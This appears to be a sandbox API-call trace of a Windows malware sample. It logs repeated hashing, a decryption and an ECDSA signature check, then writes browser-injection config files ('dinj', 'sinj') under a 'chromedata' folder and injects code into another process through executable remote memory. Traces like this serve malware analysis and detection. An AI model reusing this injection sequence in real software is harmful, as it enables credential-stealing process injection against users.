	[0250.482] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.482] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.482] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0250.483] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfe28
	[0250.483] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27bfe28, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bfe28, pdwDataLen=0x128c3c) returned 1
	[0250.483] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.483] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.483] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.483] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.483] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0250.483] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.483] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfe78
	[0250.483] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27bfe78, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bfe78, pdwDataLen=0x128c3c) returned 1
	[0250.483] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.483] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.483] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.483] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.484] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0250.484] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.484] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfdb0
	[0250.484] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27bfdb0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bfdb0, pdwDataLen=0x128c3c) returned 1
	[0250.484] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.484] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.484] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.484] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.484] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0250.484] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.484] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3de8
	[0250.484] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3de8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3de8, pdwDataLen=0x128c3c) returned 1
	[0250.484] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.484] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.484] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.484] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.485] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0250.485] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3e10
	[0250.485] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3e10, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3e10, pdwDataLen=0x128c3c) returned 1
	[0250.485] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.485] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.485] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.485] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.485] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0250.485] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.485] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3e38
	[0250.485] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3e38, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3e38, pdwDataLen=0x128c3c) returned 1
	[0250.485] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.485] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.485] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.486] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.486] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0250.486] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3e60
	[0250.486] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3e60, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3e60, pdwDataLen=0x128c3c) returned 1
	[0250.486] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.486] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.486] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.486] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.486] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0250.486] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.486] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3e88
	[0250.486] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3e88, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3e88, pdwDataLen=0x128c3c) returned 1
	[0250.486] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.486] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.486] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.487] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.487] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0250.487] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3eb0
	[0250.487] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3eb0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3eb0, pdwDataLen=0x128c3c) returned 1
	[0250.487] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.487] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.487] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.487] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.487] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0250.487] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3ed8
	[0250.487] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3ed8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3ed8, pdwDataLen=0x128c3c) returned 1
	[0250.487] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.487] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.487] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.488] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.488] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0250.488] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3f00
	[0250.488] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3f00, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3f00, pdwDataLen=0x128c3c) returned 1
	[0250.488] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.488] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.488] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.488] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.488] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0250.488] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.488] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3f28, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3f28, pdwDataLen=0x128c3c) returned 1
	[0250.488] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.488] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.488] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.489] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.489] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0250.489] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.489] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3f50, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3f50, pdwDataLen=0x128c3c) returned 1
	[0250.489] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.489] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.489] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.489] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.489] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0250.489] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.489] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3f78, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3f78, pdwDataLen=0x128c3c) returned 1
	[0250.489] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.489] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.491] CryptImportKey (in: hProv=0x225d20, pbData=0x128c30, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128c70 | out: phKey=0x128c70*=0x22b6b80) returned 1
	[0250.491] CryptSetKeyParam (hKey=0x22b6b80, dwParam=0x4, pbData=0x128c5c*=0x1, dwFlags=0x0) returned 1
	[0250.491] CryptSetKeyParam (hKey=0x22b6b80, dwParam=0x1, pbData=0x27c4090, dwFlags=0x0) returned 1
	[0250.493] CryptDecrypt (in: hKey=0x22b6b80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28fe3f0, pdwDataLen=0x128c64 | out: pbData=0x28fe3f0, pdwDataLen=0x128c64) returned 1
	[0250.494] CryptDestroyKey (hKey=0x22b6b80) returned 1
	[0250.494] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.494] GetVersion () returned 0x1db10106
	[0250.495] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128c70, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128c70) returned 0x0
	[0250.496] BCryptImportKeyPair (in: hAlgorithm=0x22ee348, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128c78, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128c78) returned 0x0
	[0250.498] BCryptGetProperty (in: hObject=0x229a2b0, pszProperty="SignatureLength", pbOutput=0x128c90, cbOutput=0x4, pcbResult=0x128c68, dwFlags=0x0 | out: pbOutput=0x128c90, pcbResult=0x128c68) returned 0x0
	[0250.498] BCryptVerifySignature (hKey=0x229a2b0, pPaddingInfo=0x0, pbHash=0x27dadf0, cbHash=0x30, pbSignature=0x291e964, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0250.500] BCryptDestroyKey (in: hKey=0x229a2b0 | out: hKey=0x229a2b0) returned 0x0
	[0250.500] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee348, dwFlags=0x0 | out: hAlgorithm=0x22ee348) returned 0x0
	[0250.500] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27dadf0) returned 1
	[0250.502] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs")) returned 0x2010
	[0250.502] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618
	[0250.503] WriteFile (in: hFile=0x618, lpBuffer=0x28dddc8*, nNumberOfBytesToWrite=0x20620, lpNumberOfBytesWritten=0x128cd0, lpOverlapped=0x0 | out: lpBuffer=0x28dddc8*, lpNumberOfBytesWritten=0x128cd0*=0x20620, lpOverlapped=0x0) returned 1
	[0250.506] CloseHandle (hObject=0x618) returned 1
	[0250.508] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7cece240, dwHighDateTime=0x1d50a6a)) 
	[0250.508] lstrlenA (lpString="dinj") returned 4
	[0250.508] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0250.508] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ffdf8*, nSize=0x5, lpNumberOfBytesWritten=0x1287c0 | out: lpBuffer=0x22ffdf8*, lpNumberOfBytesWritten=0x1287c0*=0x5) returned 1
	[0250.509] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x2056c, flAllocationType=0x3000, flProtect=0x40) returned 0x5c0000
	[0250.509] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5c0000, lpBuffer=0x291e9e8*, nSize=0x2056c, lpNumberOfBytesWritten=0x1287c0 | out: lpBuffer=0x291e9e8*, lpNumberOfBytesWritten=0x1287c0*=0x2056c) returned 1
	[0250.512] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0250.512] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x12884c*, nSize=0x400, lpNumberOfBytesWritten=0x1287c0 | out: lpBuffer=0x12884c*, lpNumberOfBytesWritten=0x1287c0*=0x400) returned 1
	[0250.513] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x200000
	[0250.513] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x200000, lpBuffer=0x128c4c*, nSize=0x80, lpNumberOfBytesWritten=0x1287c0 | out: lpBuffer=0x128c4c*, lpNumberOfBytesWritten=0x1287c0*=0x80) returned 1
	[0250.513] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x230000
	[0250.514] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128740, nSize=0x70, lpNumberOfBytesRead=0x128720 | out: lpBuffer=0x128740*, lpNumberOfBytesRead=0x128720*=0x70) returned 1
	[0250.514] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x5f0000
	[0250.514] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5f0000, lpBuffer=0x27dadf0*, nSize=0x2c, lpNumberOfBytesWritten=0x128718 | out: lpBuffer=0x27dadf0*, lpNumberOfBytesWritten=0x128718*=0x2c) returned 1
	[0250.514] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128740*, nSize=0x70, lpNumberOfBytesWritten=0x128718 | out: lpBuffer=0x128740*, lpNumberOfBytesWritten=0x128718*=0x70) returned 1
	[0250.515] ResetEvent (hEvent=0x478) returned 1
	[0250.515] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0250.577] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128740, nSize=0x70, lpNumberOfBytesRead=0x128718 | out: lpBuffer=0x128740*, lpNumberOfBytesRead=0x128718*=0x70) returned 1
	[0250.578] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0250.578] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27dadf0) returned 1
	[0250.578] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x200000, lpBuffer=0x128c4c, nSize=0x80, lpNumberOfBytesRead=0x1287d4 | out: lpBuffer=0x128c4c*, lpNumberOfBytesRead=0x1287d4*=0x80) returned 1
	[0250.578] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x12884c, nSize=0x400, lpNumberOfBytesRead=0x1287d4 | out: lpBuffer=0x12884c*, lpNumberOfBytesRead=0x1287d4*=0x400) returned 1
	[0250.578] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x230004, lpBuffer=0x128800, nSize=0x4, lpNumberOfBytesRead=0x1287d4 | out: lpBuffer=0x128800*, lpNumberOfBytesRead=0x1287d4*=0x4) returned 1
	[0250.578] VirtualFreeEx (hProcess=0x47c, lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0250.578] VirtualFreeEx (hProcess=0x47c, lpAddress=0x200000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0250.578] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0250.579] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0250.579] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x291e9e8) returned 1
	[0250.579] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x28dddc8) returned 1
	[0250.583] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x618
	[0250.583] GetFileTime (in: hFile=0x618, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0250.585] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0250.585] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6b80
	[0250.585] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0250.585] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0250.585] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff90
	[0250.585] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e1e0
	[0250.585] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0250.585] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0250.585] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22fff90, Size=0x10) returned 0x22ffee8
	[0250.585] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d2c8
